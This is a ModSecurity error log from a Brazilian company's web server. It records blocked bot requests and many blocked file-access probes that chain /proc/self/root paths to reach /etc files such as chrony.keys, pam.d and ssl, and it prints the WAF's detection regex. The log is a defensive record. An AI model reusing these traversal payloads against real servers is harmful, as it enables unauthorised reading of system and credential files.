[Tue Mar 17 11:16:28.016093 2026] [:error] [pid 18380:tid 140411708356352] [client 74.7.228.16:46260] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abliPK4xEDsg_V3ESNY-NwAAAgQ"]
[Tue Mar 17 11:16:47.794871 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.241.46:44050] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abliTweiSKl8TjouI-YLPwAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:16:54.426180 2026] [:error] [pid 1016:tid 140411641214720] [client 74.7.241.46:38864] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abliVpqmL8PQht4WJFlRZAAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:19:31.951794 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.241.46:46232] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abli86BJNF7axNlVR0UHGQAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:20:09.720454 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.244.31:38338] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abljGZqmL8PQht4WJFlSNgAAAVc"]
[Tue Mar 17 11:20:58.051082 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.241.46:52022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abljSgeiSKl8TjouI-YL2wAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:21:28.390966 2026] [:error] [pid 1016:tid 140411741927168] [client 74.7.228.16:53122] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abljaJqmL8PQht4WJFlSQwAAAUA"]
[Tue Mar 17 11:21:44.387260 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.241.46:51544] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abljeKBJNF7axNlVR0UHTAAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:21:52.205173 2026] [:error] [pid 17965:tid 140411540502272] [client 74.7.241.46:47148] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abljgKt8Nd0UC_OcbVG6agAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:22:05.343234 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.241.46:50964] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abljjaBJNF7axNlVR0UHWAAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:22:25.736576 2026] [:error] [pid 9155:tid 140411649607424] [client 74.7.243.203:42820] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abljodbI7zhHXcabyMUwgAAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:22:28.624490 2026] [:error] [pid 18380:tid 140411607643904] [client 74.7.243.203:54860] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abljo64xEDsg_V3ESNY-UQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:22:31.136381 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.243.203:54876] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abljp7-sgTmmJoPuMdypmAAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:22:45.619852 2026] [:error] [pid 18709:tid 140411674785536] [client 74.7.243.203:47448] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abljtTarLhPAjZGI1b25agAAA4g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:22:53.299729 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.243.203:34524] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abljvQeiSKl8TjouI-YMHAAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:22:55.631403 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.203:49398] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abljv9Y0UrI5A3LftIzs4AAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:22:57.810959 2026] [:error] [pid 9299:tid 140411616036608] [client 74.7.243.203:49400] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abljwb-sgTmmJoPuMdypnAAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:23:10.646000 2026] [:error] [pid 18709:tid 140411683178240] [client 74.7.243.203:49402] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abljzjarLhPAjZGI1b25dQAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:23:18.483517 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.243.203:45776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablj1geiSKl8TjouI-YMJQAAA8U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:23:19.802843 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.243.203:45788] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablj16BJNF7axNlVR0UHYAAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:23:21.167895 2026] [:error] [pid 18709:tid 140411741927168] [client 74.7.243.203:35342] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablj2TarLhPAjZGI1b25dgAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:23:35.008362 2026] [:error] [pid 9299:tid 140411658000128] [client 74.7.243.203:35358] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablj57-sgTmmJoPuMdypqQAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:23:38.434663 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.203:55804] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablj6tY0UrI5A3LftIzs6QAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
